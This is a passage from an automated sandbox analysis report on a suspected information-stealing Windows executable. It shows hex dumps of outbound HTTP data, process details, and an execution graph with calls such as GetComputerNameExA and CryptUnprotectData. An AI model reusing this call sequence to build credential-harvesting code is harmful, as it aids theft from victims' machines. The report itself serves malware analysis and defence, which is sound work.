                                                2024-04-25 15:39:05 UTC15331OUTData Raw: b2 53 8a 81 f8 fb c0 a5 1f 0e 19 11 fa 3c 67 69 1d f1 fe 99 02 b2 f2 cc 6c 77 85 96 08 f9 dd 57 7c 37 4e 54 be b5 92 46 c8 a9 45 85 79 a3 6f 1b e2 ed d5 32 11 87 e3 e0 1a 3b 76 96 31 7a d5 a8 0c 42 ce aa 31 8f b2 ac bb 72 a7 8e 48 50 e9 a6 08 8a 31 80 36 bd 27 7c db 65 e4 ef 5a be 40 1d 9e e2 7d a9 b5 8e 27 36 90 fa f4 10 05 6f 6b 75 6c 5a 37 51 61 4d e5 8f 9f 42 87 7e 9f 8f 78 84 72 c2 f9 b6 5a 87 d8 b6 74 f7 f9 fe 68 8a a5 59 e6 de e9 89 52 59 f0 26 c6 fe 7c 5c c9 b9 98 c0 0d 99 cf 42 f7 8c 78 81 b7 89 9e 5b 0d 5f e4 fe 3c 72 92 6e 9d 9d 10 34 ff f1 89 2c cc 50 ce b6 7f 1a 9e 08 b2 6b 0b 33 27 82 7d 0b 2d d2 16 ca 16 8a 6d c9 26 06 a9 9a e4 b8 88 74 3d c7 8d 86 8c ca f5 d8 c7 31 da 92 c3 67 0c b1 c0 86 1e 1f 36 db 93 58 89 f5 41 a5 2d 34 e9 ce ca 5f 6a
                                                Data Ascii: S<gilwW|7NTFEyo2;v1zB1rHP16'|eZ@}'6okulZ7QaMB~xrZthYRY&|\Bx[_<rn4,Pk3'}-m&t=1g6XA-4_j
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: 79 07 4e c4 68 83 78 7f fc cd a5 47 74 cc b2 0c 9d 14 93 71 9a 7e 85 e1 2a ff 48 52 ac dd 20 f2 88 e9 53 89 6b 63 3b c0 19 c3 4c 02 e9 26 8a ef ea 74 44 65 34 ba 83 dd f0 60 a9 cd 7c 9c 84 04 96 11 c4 73 e6 44 c9 b5 f5 f1 ed 59 8f 1a ff 68 6b af 73 2d 75 1b d4 ca c7 48 64 4e 07 ed c4 d5 fb cd 8f 1f cf 79 98 e8 45 dc dd ca 68 69 ae dc 73 65 55 e0 d7 d7 71 56 a1 d3 80 b2 8e 53 4d a1 9d dc 53 1d 76 f1 61 a0 41 cd 49 98 71 75 ff 37 a0 7b 5b e6 bb 5c aa 2e 02 78 39 dd 41 f4 01 1f 44 b4 ff 51 4f 24 1f f5 37 77 95 76 e5 c8 b5 e6 18 04 75 6e 67 1a 33 8b dc 63 c5 f1 3a 9f e5 a8 a8 dd 15 aa 26 02 12 53 16 4c 73 97 13 39 ae 3a dd 31 15 37 2e 3d 1c 39 fe 3d 85 d5 ba 4c e6 66 bc 22 bd e2 ce d2 99 3f 51 87 c1 d9 ff 80 66 7b 1a 9a 80 82 a3 c9 47 09 bd 9a 8c 17 67 7f d6
                                                Data Ascii: yNhxGtq~*HR Skc;L&tDe4`|sDYhks-uHdNyEhiseUqVSMSvaAIqu7{[\.x9ADQO$7wvung3c:&SLs9:17.=9=Lf"?Qf{Gg
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: a4 cc bf 19 4d 8c e0 dc 6a d8 63 94 7f 18 49 86 8d 16 0f 53 b6 98 42 48 ea 02 fe 69 13 51 22 2f bd 2e ea 31 8d fb e4 a6 81 da a6 35 b2 e8 42 59 c5 fd ed 9d a9 5b 1e 47 8a 2b 64 8b f3 5d 55 41 fd 33 91 58 88 98 01 75 ba dd 65 80 74 d7 13 f0 cc 57 b1 01 e2 ce 40 98 ec 9d 73 ef f7 7f 38 13 4f 15 01 38 0d dc a7 9a 78 1f 6c 77 5d 18 3f 70 3b 7d d2 31 fb e3 b7 62 1a 0e c5 13 21 1e a8 07 1a 78 de d2 b8 af 4c 6d e6 55 03 25 62 26 44 e3 a5 a8 ee 90 b9 14 e8 86 e0 18 02 15 42 c0 8b 5b 1c 31 0c 9b c4 0e 7e 2c 72 92 e9 58 a2 bf 35 fd 9f eb cb 10 32 66 10 47 99 2a 8f ca 10 71 5a ad d3 c0 c0 16 12 08 ea 0d 39 f8 45 c9 5d 55 7f 07 23 04 eb 84 35 2e df 81 27 53 c4 e2 65 80 8e a6 22 88 d5 16 26 9c 80 21 f0 33 b2 e3 f3 6f 6d 5e 62 b2 e2 76 03 6a ff c5 8b ff 83 9d 36 9b 8e
                                                Data Ascii: MjcISBHiQ"/.15BY[G+d]UA3XuetW@s8O8xlw]?p;}1b!xLmU%b&DB[1~,rX52fG*qZ9E]U#5.'Se"&!3om^bvj6
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: ae 43 94 14 a8 f1 19 d9 8f 73 7d 90 3a 95 47 8c 83 3a b6 75 a6 5f 5f 3c cc 11 80 d6 6f ae 4a 61 49 65 f0 29 36 bc d8 45 59 5d 29 fd d0 92 ee 8d 4c 9b d3 5f 99 b1 4d 21 0f d1 0b 45 46 c9 24 0d 2d 66 2b cc d8 8f 75 99 a6 b3 cc fa 2d 73 3f 86 57 48 2f bb ee ec 44 bf b3 65 74 fb e1 4b 54 8c 4f 0b 12 01 22 3b 84 41 22 39 61 c9 09 90 74 21 3d 61 eb d4 70 0c e0 87 94 f4 61 a9 e3 0b 85 c8 16 24 af 7e ad 57 1d 02 7a b7 9e a4 43 39 51 78 5f 98 e9 e3 cd 5b e5 d1 2d 7c 17 76 b2 7f 8d 52 b7 2d bb a6 ec b0 43 e8 9b 08 0e dd 2e b8 8b f7 1c c2 bc a2 4b 3d 4c 40 9b 6f b6 c9 f4 ee 09 e2 ac bd b1 ea 1c 7d bb 5d 83 94 35 20 ac 9e b8 35 2a 28 08 91 42 6c f6 5f ca 7b e5 92 00 12 97 1c f4 99 79 03 6a 6a cb b9 2d a4 a8 07 18 51 08 71 19 1d ae ec 0a 60 dd 26 91 77 02 3d 47 5f d6
                                                Data Ascii: Cs}:G:u__<oJaIe)6EY])L_M!EF$-f+u-s?WH/DetKTO";A"9at!=apa$~WzC9Qx_[-|vR-C.K=L@o}]5 5*(Bl_{yjj-Qq`&w=G_
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: cd 1f 66 a1 43 26 86 61 fe 01 ea 6d c3 cc 28 3c e3 c1 ce bc dd 2b bc c2 67 fd 14 05 56 c6 6a 25 d9 51 3f 48 68 f8 8e 89 48 bd b7 ee e4 38 53 f0 8c d2 26 32 79 03 f9 f6 c9 88 2c 8a 8c 81 a9 82 d7 87 70 73 34 dc 09 63 02 af 54 95 71 26 59 1d 95 d4 20 2f b8 a4 d1 02 c1 f9 0a a8 ed 2d a8 25 96 42 ca 18 41 11 9c a8 ec a5 58 d3 f7 b5 55 bf bc 63 7f 6d 84 35 b9 9f 30 ee dc 88 f6 8b 0a 5b 57 3c 69 28 bd 71 11 58 ba e2 95 08 99 0a 0c 30 d6 5f 81 90 99 2b 39 5d ad 84 ca f0 87 bd 2d b4 1a 4d f3 db 8a 02 19 fe 98 47 b1 09 ed 8e a9 cc ec 7c 63 81 0d b4 70 40 fe 8c af f0 ad d9 a4 c3 a4 70 12 4f b4 d8 aa 77 4b 23 4b 41 db b3 07 bd bd 05 17 d1 ec 03 e2 bb 4f 5d 90 c2 2b 65 e9 6f e6 ad 24 2e 39 ce 5f 7f 6d a3 10 66 b8 59 76 97 20 2a 0f a3 fa ce b7 4b 24 db 70 32 49 56 3c
                                                Data Ascii: fC&am(<+gVj%Q?HhH8S&2y,ps4cTq&Y /-%BAXUcm50[W<i(qX0_+9]-MG|cp@pOwK#KAO]+eo$.9_mfYv *K$p2IV<
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: a0 c1 37 1f a2 42 6e 53 d6 66 bf dc 0d 19 d8 ae 9b ed 96 8b f4 9b 1f ad ea bc 52 b4 3d 37 d8 b1 e5 83 6f bd 4e 14 76 87 23 a9 3e 8a 3e 94 4c 3f ee 39 bf 1f 6b 97 d7 66 aa 3d 3a 7b 0e 7f 98 b9 c6 24 ca bb 56 a4 ff 4c d9 77 77 74 10 13 f4 62 ee 8e 1f 31 e7 c8 d6 92 fe 62 dd c6 73 ff eb 4f ff 19 e2 d2 28 6b e7 0a de 1b a8 a1 dd 0f 56 32 d2 d6 ee 2e 3c 4c c4 32 6c 3b 5c cb 6d 98 97 df a4 9d cc 59 ee 72 7a eb f7 6b 2d 4e df e5 a2 43 d9 1f 63 fb 2f d5 ac fb 53 46 d9 fd 9f 07 b9 85 29 55 ef 0f db 53 de 5c 33 2a 67 fe b2 1f b9 5b bd 90 fd 25 7d e3 a6 ff 6f fd f6 10 27 ae f7 cd c3 29 3e 0e da e3 4b f6 f7 3e f0 03 8f c4 b8 d5 75 38 cb 64 c8 a7 69 c1 c4 17 3a 1a 15 01 a1 6b 7f ba 42 64 15 d1 cb 8b 2f 0c aa e6 33 66 e4 fc 54 03 8d f4 e1 25 97 cb d4 0d 70 22 bf cb e7
                                                Data Ascii: 7BnSfR=7oNv#>>L?9kf=:{$VLwwtb1bsO(kV2.<L2l;\mYrzk-NCc/SF)US\3*g[%}o')>K>u8di:kBd/3fT%p"
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: b0 7e 8b d5 f5 59 e7 22 e8 1c 88 9a db 92 91 5d f1 dd 10 d5 eb 0c ae 30 52 fb ad 9a b0 1f e2 e3 16 41 40 8e d7 00 03 45 c1 86 c8 09 d6 06 08 2d d9 11 2d 2d 33 67 28 0a ef 22 8f 30 2c 69 1b 6f f2 ee e8 05 eb de 2c 57 56 63 7a 80 6d 8d e9 61 f1 fb 81 e0 86 cf 4c 2a 16 56 42 c9 b9 a5 45 d0 a3 37 6d 46 bd df f0 8b 3e 80 da b5 7a 7f 11 42 37 a6 7b ec d2 72 63 bb 24 03 ad 62 5e ef da 6a f9 99 b5 dd 4c 33 c1 a8 64 c8 32 cf ad d2 f9 1b d6 96 c6 ff e3 1c b7 8e 02 fb 26 8f 26 a4 a2 28 cd 02 6d e6 ac bd db 66 8e 8e d7 5d 20 0e f0 e4 bb 61 c1 0d 12 6c ec b9 76 49 22 71 ce 6a 8c ef 65 75 6d 26 d5 d1 26 33 e3 04 b9 98 73 8a 86 24 80 e6 60 dc 0c 5c 51 21 45 70 7e 25 4f b1 62 99 62 d6 71 e2 54 44 1d 34 bf a6 e6 48 8e 72 b1 32 32 cf 53 0f e0 bd ef 20 16 ad 5b 9d 36 79 de
                                                Data Ascii: ~Y"]0RA@E---3g("0,io,WVczmaL*VBE7mF>zB7{rc$b^jL3d2&&(mf] alvI"qjeum&&3s$`\Q!Ep~%ObbqTD4Hr22S [6y
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: ff 26 2c 75 5a ad 7e f2 4a 80 7d fe df d8 ff 7a 27 c8 db f5 d0 df 96 68 eb 83 2a 3f 0d e8 4a bc a6 0b c7 56 1f 29 80 e6 7d 5a 5a a0 32 e7 b3 ba 70 40 75 18 d3 09 07 d5 e9 e1 a3 d4 30 5a ba b5 7f 4c 1c 64 9c 2d 2a 55 c6 19 a9 45 28 0d 4c 4d ca 1b 3d 4c 56 e9 17 c0 e2 eb 71 ca 33 d9 c9 bf 32 79 80 f9 bf 31 c3 9e d3 87 04 81 bc 03 fc 2c 1e 9d e7 b8 2c cf 3d e9 dd a0 ad f7 5d 27 e9 ba c2 75 0c 23 db 81 21 b5 b4 fc e9 b8 2d 94 66 ec 06 51 ff fc f4 56 05 d3 eb 0b 68 ec 78 c7 b2 b2 d8 61 99 cc 93 54 0d cc 0e 5f 4c e1 e0 8a fb 28 18 59 a3 aa 32 4b 33 4e 54 22 4d 33 df c9 3c e4 79 68 a0 55 77 a8 e0 7a 16 27 ee 0b a9 a9 3b 2c 1d 35 7e f4 70 b0 4d 01 ff 00 ca c3 11 fe 08 56 c7 57 c3 e4 5b ff ba 6e 09 f0 01 4b 7a 73 25 17 0b 17 cd aa a4 16 f1 0e ec 9c 4e 15 6c 26 eb
                                                Data Ascii: &,uZ~J}z'h*?JV)}ZZ2p@u0ZLd-*UE(LM=LVq32y1,,=]'u#!-fQVhxaT_L(Y2K3NT"M3<yhUwz';,5~pMVW[nKzs%Nl&
                                                2024-04-25 15:39:08 UTC804INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=8kne1vmgbnrm6qnb8ahtgu28fq; expires=Mon, 19-Aug-2024 09:25:46 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSNAETe9%2F3etRN9gO44f8xwkvPr0sekuSX9WMD44aE1%2FdHyBpir67PfdrOO07GBgCzQ3mLEkNiCZN1znF7MjZDuirPrKu6vDT264a7F7uRLo6ABiQ2ZFd%2BuvABP0nGlOixgo6PeKkQjB"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c82be6569f3-ATL
                                                alt-svc: h3=":443"; ma=86400


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:17:38:56
                                                Start date:25/04/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xaf0000
                                                File size:6'173'144 bytes
                                                MD5 hash:93115E1730DA5003243C419C7D841CA3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:19%
                                                  Total number of Nodes:248
                                                  Total number of Limit Nodes:5
                                                  execution_graph 22516 b051b0 22517 b051ba 22516->22517 22520 b28a20 22517->22520 22522 b28a75 22520->22522 22521 b051cc 22523 b28aee 22522->22523 22526 b25970 LdrInitializeThunk 22522->22526 22523->22521 22527 b25970 LdrInitializeThunk 22523->22527 22526->22523 22527->22521 22751 b02332 22752 b02341 22751->22752 22757 b05470 22752->22757 22754 b02368 22755 af9970 RtlExpandEnvironmentStrings 22754->22755 22756 b02372 22755->22756 22758 b05490 22757->22758 22758->22758 22759 b0549b RtlExpandEnvironmentStrings 22758->22759 22760 b054be 22759->22760 22761 b054ce RtlExpandEnvironmentStrings 22760->22761 22762 b05545 22761->22762 22762->22762 22763 b28530 LdrInitializeThunk 22762->22763 22764 b0565a 22763->22764 22765 b2583d 22766 b258e2 RtlReAllocateHeap 22765->22766 22767 b2588b 22765->22767 22768 b25932 22766->22768 22767->22766 22532 b06ea6 22533 b06edc 22532->22533 22546 b05030 22533->22546 22535 b06f2d 22536 b05030 LdrInitializeThunk 22535->22536 22537 b06fe8 22536->22537 22537->22537 22538 b05030 LdrInitializeThunk 22537->22538 22539 b070a3 22538->22539 22540 b05030 LdrInitializeThunk 22539->22540 22541 b0714d 22540->22541 22541->22541 22542 b21de0 LdrInitializeThunk 22541->22542 22543 b072d8 22542->22543 22544 b05030 LdrInitializeThunk 22543->22544 22545 b072eb 22544->22545 22548 b05050 22546->22548 22548->22548 22550 b28530 22548->22550 22549 b0510a 22551 b28550 22550->22551 22551->22551 22552 b286ce 22551->22552 22554 b25970 LdrInitializeThunk 22551->22554 22552->22549 22554->22552 22559 b069ab 22564 b07dc0 22559->22564 22561 b069c3 22562 b07dc0 LdrInitializeThunk 22561->22562 22563 b069e8 22562->22563 22565 b07e84 22564->22565 22568 b0af10 22565->22568 22571 b0b040 22568->22571 22572 b28530 LdrInitializeThunk 22571->22572 22573 b0b096 22572->22573 22777 b0432f 22778 b04338 22777->22778 22779 af9970 RtlExpandEnvironmentStrings 22778->22779 22780 b04345 22779->22780 22574 b0e291 22575 b0e2a7 22574->22575 22578 b28fa0 22575->22578 22577 b0e2d7 22579 b28ff5 22578->22579 22581 b2905e 22579->22581 22584 b25970 LdrInitializeThunk 22579->22584 22583 b2916e 22581->22583 22585 b25970 LdrInitializeThunk 22581->22585 22583->22577 22584->22581 22585->22583 22781 b25314 22782 b25390 LoadLibraryW 22781->22782 22783 b2536d 22781->22783 22783->22782 22586 b04897 22591 af9970 22586->22591 22588 b0489e 22589 af9970 RtlExpandEnvironmentStrings 22588->22589 22590 b048a7 22589->22590 22592 af9985 22591->22592 22594 af99c1 22591->22594 22595 b21a60 22592->22595 22594->22588 22596 b21ad1 22595->22596 22597 b21b0f RtlExpandEnvironmentStrings 22595->22597 22596->22597 22784 b09717 22785 b09727 22784->22785 22785->22785 22786 b05030 LdrInitializeThunk 22785->22786 22787 b09774 22786->22787 22788 b05030 LdrInitializeThunk 22787->22788 22789 b098c6 22788->22789 22789->22789 22790 b05030 LdrInitializeThunk 22789->22790 22791 b09a23 22790->22791 22792 b04517 22795 b04520 22792->22795 22793 b0af10 LdrInitializeThunk 22794 b04629 22793->22794 22795->22793 22796 b0bd17 22797 b0bd1c 22796->22797 22797->22797 22798 b0be47 22797->22798 22800 b25970 LdrInitializeThunk 22797->22800 22800->22798 22808 b0a300 22809 b0a30e 22808->22809 22813 b0a350 22808->22813 22814 b0a410 22809->22814 22811 b0a3cc 22812 b08510 LdrInitializeThunk 22811->22812 22811->22813 22812->22813 22815 b0a47f 22814->22815 22816 b28720 LdrInitializeThunk 22815->22816 22817 b0a56d 22816->22817 22598 b15082 22599 b1508c 22598->22599 22600 b154ae GetComputerNameExA 22599->22600 22602 b1552e 22600->22602 22601 b155bb GetComputerNameExA 22603 b15632 22601->22603 22602->22601 22602->22602 22609 b21b85 22612 b27b20 22609->22612 22611 b21bbc GetVolumeInformationW 22818 b0dc0a 22819 b0dcd9 22818->22819 22820 b0b040 LdrInitializeThunk 22819->22820 22821 b0dd40 22820->22821 22822 b0b040 LdrInitializeThunk 22821->22822 22823 b0de80 22822->22823 22618 b0e3f2 22621 b28e30 22618->22621 22622 b28e50 22621->22622 22622->22622 22623 b0e412 22622->22623 22625 b25970 LdrInitializeThunk 22622->22625 22625->22623 22626 b05cf2 22628 b05d4f 22626->22628 22627 b05dae 22628->22627 22630 b25970 LdrInitializeThunk 22628->22630 22630->22627 22631 b11df6 22632 b11e10 22631->22632 22632->22632 22635 b23ae0 22632->22635 22634 b11e4f 22636 b23b47 22635->22636 22638 b23bae 22636->22638 22641 b25970 LdrInitializeThunk 22636->22641 22640 b23cae 22638->22640 22642 b25970 LdrInitializeThunk 22638->22642 22640->22634 22641->22638 22642->22640 22643 b0e2fa 22644 b28e30 LdrInitializeThunk 22643->22644 22645 b0e312 22644->22645 22655 b0b7e5 22656 b0b7f3 22655->22656 22660 b0c250 22656->22660 22668 b109c0 22656->22668 22657 b0b85e 22661 b0c266 22660->22661 22663 b0c310 22660->22663 22661->22661 22662 b28530 LdrInitializeThunk 22661->22662 22661->22663 22664 b0c3ed 22662->22664 22663->22657 22664->22663 22665 b28a20 LdrInitializeThunk 22664->22665 22667 b0c40f 22665->22667 22667->22663 22672 b25970 LdrInitializeThunk 22667->22672 22669 b10b40 22668->22669 22670 b109d9 22668->22670 22669->22657 22670->22670 22671 b0af10 LdrInitializeThunk 22670->22671 22671->22669 22672->22663 22673 b024e5 22674 b024f4 22673->22674 22679 b082e0 22674->22679 22676 b02522 22677 af9970 RtlExpandEnvironmentStrings 22676->22677 22678 b0252c 22677->22678 22680 b08300 22679->22680 22680->22680 22681 b0830b RtlExpandEnvironmentStrings 22680->22681 22682 b08328 22681->22682 22683 b08338 RtlExpandEnvironmentStrings 22682->22683 22686 b28720 22683->22686 22685 b08359 22687 b28740 22686->22687 22688 b288ae 22687->22688 22690 b25970 LdrInitializeThunk 22687->22690 22688->22685 22690->22688 22833 b12f69 22834 b12f80 22833->22834 22834->22834 22835 b28530 LdrInitializeThunk 22834->22835 22836 b1312f 22835->22836 22836->22836 22837 b28530 LdrInitializeThunk 22836->22837 22837->22836 22838 b15d6f 22840 b15d76 22838->22840 22839 b21a60 RtlExpandEnvironmentStrings 22841 b1602a 22839->22841 22840->22839 22840->22840 22842 b16075 GetPhysicallyInstalledSystemMemory 22841->22842 22843 b1609a 22842->22843 22843->22843 22696 b0c5d0 22697 b0c62f 22696->22697 22698 b0c5db 22696->22698 22698->22698 22699 b0af10 LdrInitializeThunk 22698->22699 22699->22697 22700 b266d7 22701 b26715 22700->22701 22702 b2680e 22701->22702 22706 b25970 LdrInitializeThunk 22701->22706 22702->22702 22704 b268de 22702->22704 22707 b25970 LdrInitializeThunk 22702->22707 22706->22702 22707->22704 22848 b19654 22850 b19659 22848->22850 22849 b19729 SysAllocString 22851 b1978a 22849->22851 22850->22849 22850->22850 22708 b046dc 22709 b046eb 22708->22709 22728 b0d460 22709->22728 22711 b046f1 22712 af9970 RtlExpandEnvironmentStrings 22711->22712 22713 b046fb 22712->22713 22714 b0deb0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 22713->22714 22715 b04710 22714->22715 22716 af9970 RtlExpandEnvironmentStrings 22715->22716 22717 b0471a 22716->22717 22718 af9970 RtlExpandEnvironmentStrings 22717->22718 22719 b04739 22718->22719 22720 b10d80 LdrInitializeThunk 22719->22720 22721 b0474e 22720->22721 22722 b11740 LdrInitializeThunk 22721->22722 22723 b04757 22722->22723 22724 af9970 RtlExpandEnvironmentStrings 22723->22724 22725 b0476a 22724->22725 22726 af9970 RtlExpandEnvironmentStrings 22725->22726 22727 b04789 22726->22727 22729 b0d526 RtlExpandEnvironmentStrings 22728->22729 22730 b0d4e9 22728->22730 22731 b0d56b 22729->22731 22730->22729 22732 b0d57b RtlExpandEnvironmentStrings 22731->22732 22733 b0d609 22732->22733 22733->22733 22734 b28720 LdrInitializeThunk 22733->22734 22735 b0d714 22734->22735 22736 af8ec0 22737 af8eca 22736->22737 22738 af8eed GetConsoleWindow 22737->22738 22739 af8f0a 22738->22739 22745 b103c1 22746 b103ea 22745->22746 22746->22746 22747 b28e30 LdrInitializeThunk 22746->22747 22748 b1043c 22747->22748 22749 b28e30 LdrInitializeThunk 22748->22749 22750 b1050c 22749->22750 22857 b25242 22858 b252e5 LoadLibraryW 22857->22858 22859 b252ae 22857->22859 22860 b252ec 22858->22860 22859->22858 22861 b06645 22862 b0665e CryptUnprotectData 22861->22862 22863 b25145 22865 b25150 22863->22865 22864 b25213 LoadLibraryW 22866 b2521d 22864->22866 22865->22864 22867 b25d4b 22868 b25da4 22867->22868 22869 b25e0e 22868->22869 22871 b25970 LdrInitializeThunk 22868->22871 22871->22869

                                                  Executed Functions

                                                  Function 00AF9970 Relevance: 7.9, Strings: 6, Instructions: 420COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 af9970-af9983 86 af9985-af9991 85->86 87 af99c1-af99c3 85->87 88 af99c8-af99d5 86->88 89 af9993-af9995 86->89 90 afa02c-afa035 87->90 93 af9a22-af9ab7 call af6960 call b21a60 call af8840 88->93 91 af99d7-af99de 89->91 92 af9997-af99bf 89->92 94 af99e0-af99f5 91->94 95 af99f7-af9a1d 91->95 92->94 102 af9ab9 93->102 103 af9b02-af9b51 call af9210 93->103 94->93 95->93 104 af9ac0-af9b00 102->104 107 af9b8f-af9bdd call af9210 103->107 108 af9b53 103->108 104->103 104->104 112 af9bdf 107->112 113 af9c1a-af9c79 call af9210 107->113 109 af9b60-af9b8d 108->109 109->107 109->109 114 af9be0-af9c18 112->114 117 af9c7b 113->117 118 af9cc4-af9cfa 113->118 114->113 114->114 119 af9c80-af9cc2 117->119 120 af9cfc-af9cff 118->120 121 af9d25-af9d6e call af9210 118->121 119->118 119->119 122 af9d00-af9d23 120->122 125 af9da4-af9f49 call af94f0 121->125 126 af9d70-af9da2 121->126 122->121 122->122 129 af9f4b 125->129 130 af9f83-af9fc1 125->130 126->125 126->126 131 af9f50-af9f81 129->131 132 af9ff7-afa017 call afe0c0 call af8850 130->132 133 af9fc3 130->133 131->130 131->131 138 afa01c-afa025 132->138 134 af9fd0-af9ff5 133->134 134->132 134->134 138->90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .-$0$2$60.6$AQNW$VU
                                                  • API String ID: 0-2944896817
                                                  • Opcode ID: 091046d3e1d297d0f49dda8e8d822329f30911580d8b4ee40ed38434f426916e
                                                  • Instruction ID: 6dfd489ef18831640d42b6cc6cb89b04b34608dd11cd945bde72e1e03c56320b
                                                  • Opcode Fuzzy Hash: 091046d3e1d297d0f49dda8e8d822329f30911580d8b4ee40ed38434f426916e
                                                  • Instruction Fuzzy Hash: 0902F1B01083858BE724DF54C494B6BBBF1BBC2348F144D1DE5D58B292D7BAD849CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B14FB4 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 620COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 b14fb4-b15095 141 b15097-b150a0 139->141 142 b150b6-b150ba 139->142 143 b150c1-b150c8 141->143 144 b150a2-b150b1 141->144 142->143 146 b15106 143->146 147 b150ca 143->147 145 b1514c-b1514f 144->145 150 b15150-b15159 145->150 149 b15108-b1510f 146->149 148 b150d0-b15102 147->148 148->148 151 b15104 148->151 152 b15111-b1511c 149->152 153 b1511e-b15134 149->153 150->150 154 b1515b-b151de 150->154 151->149 155 b15137-b1513d 152->155 153->155 156 b151e0-b15213 154->156 157 b15215-b1521e 154->157 158 b15145-b1514a 155->158 159 b1513f-b15141 155->159 156->156 156->157 160 b15220-b15226 157->160 161 b1523b-b15247 157->161 158->145 159->145 165 b15143 159->165 162 b15230-b15239 160->162 163 b15249-b1524f 161->163 164 b1525b-b15266 161->164 162->161 162->162 166 b15250-b15259 163->166 168 b15271-b152e0 call b27b20 164->168 169 b15268-b1526e call af8850 164->169 165->154 166->164 166->166 175 b152e2 168->175 176 b15336-b1533f 168->176 169->168 179 b152f0-b15334 175->179 177 b15341-b15347 176->177 178 b1535b-b15367 176->178 180 b15350-b15359 177->180 181 b15369-b1536f 178->181 182 b1537b-b1539a call b27b20 178->182 179->176 179->179 180->178 180->180 183 b15370-b15379 181->183 185 b1539f-b153af 182->185 183->182 183->183 186 b153b2-b1540a 185->186 187 b1545d-b15466 186->187 188 b1540c-b1540f 186->188 190 b15468-b1546f 187->190 191 b1547b-b15487 187->191 189 b15410-b1545b 188->189 189->187 189->189 194 b15470-b15479 190->194 192 b15489-b1548f 191->192 193 b1549b-b154a9 call b27b20 191->193 195 b15490-b15499 192->195 197 b154ae-b1552c GetComputerNameExA 193->197 194->191 194->194 195->193 195->195 198 b15578-b15581 197->198 199 b1552e-b1552f 197->199 201 b15583-b15589 198->201 202 b1559b-b155a7 198->202 200 b15530-b15576 199->200 200->198 200->200 203 b15590-b15599 201->203 204 b155a9-b155af 202->204 205 b155bb-b15630 GetComputerNameExA 202->205 203->202 203->203 206 b155b0-b155b9 204->206 207 b15680-b15689 205->207 208 b15632 205->208 206->205 206->206 209 b156ab-b156b7 207->209 210 b1568b-b15691 207->210 211 b15640-b1567e 208->211 213 b156b9-b156bf 209->213 214 b156cb-b1572d 209->214 212 b156a0-b156a9 210->212 211->207 211->211 212->209 212->212 215 b156c0-b156c9 213->215 217 b15773-b1577c 214->217 218 b1572f 214->218 215->214 215->215 220 b1579b-b157a7 217->220 221 b1577e-b15784 217->221 219 b15730-b15771 218->219 219->217 219->219 223 b157a9-b157af 220->223 224 b157bb-b15837 call b27b20 220->224 222 b15790-b15799 221->222 222->220 222->222 225 b157b0-b157b9 223->225 229 b15879-b15882 224->229 230 b15839 224->230 225->224 225->225 232 b15884-b1588a 229->232 233 b1589b-b158a0 229->233 231 b15840-b15877 230->231 231->229 231->231 234 b15890-b15899 232->234 235 b158c6-b158d2 233->235 234->233 234->234 236 b158d8-b158dc 235->236 237 b1596e-b15970 235->237 238 b158b0-b158b2 236->238 239 b158de-b158fe 236->239 240 b15974-b159bc 237->240 245 b158b7-b158c0 238->245 241 b15930-b1593b 239->241 242 b15900-b15903 239->242 243 b159f9-b15a02 240->243 244 b159be-b159bf 240->244 241->245 247 b15941-b15969 241->247 242->241 246 b15905-b15920 242->246 249 b15a04-b15a0a 243->249 250 b15a1b-b15a1e call b1a600 243->250 248 b159c0-b159f7 244->248 245->235 251 b15972 245->251 246->245 247->245 248->243 248->248 252 b15a10-b15a19 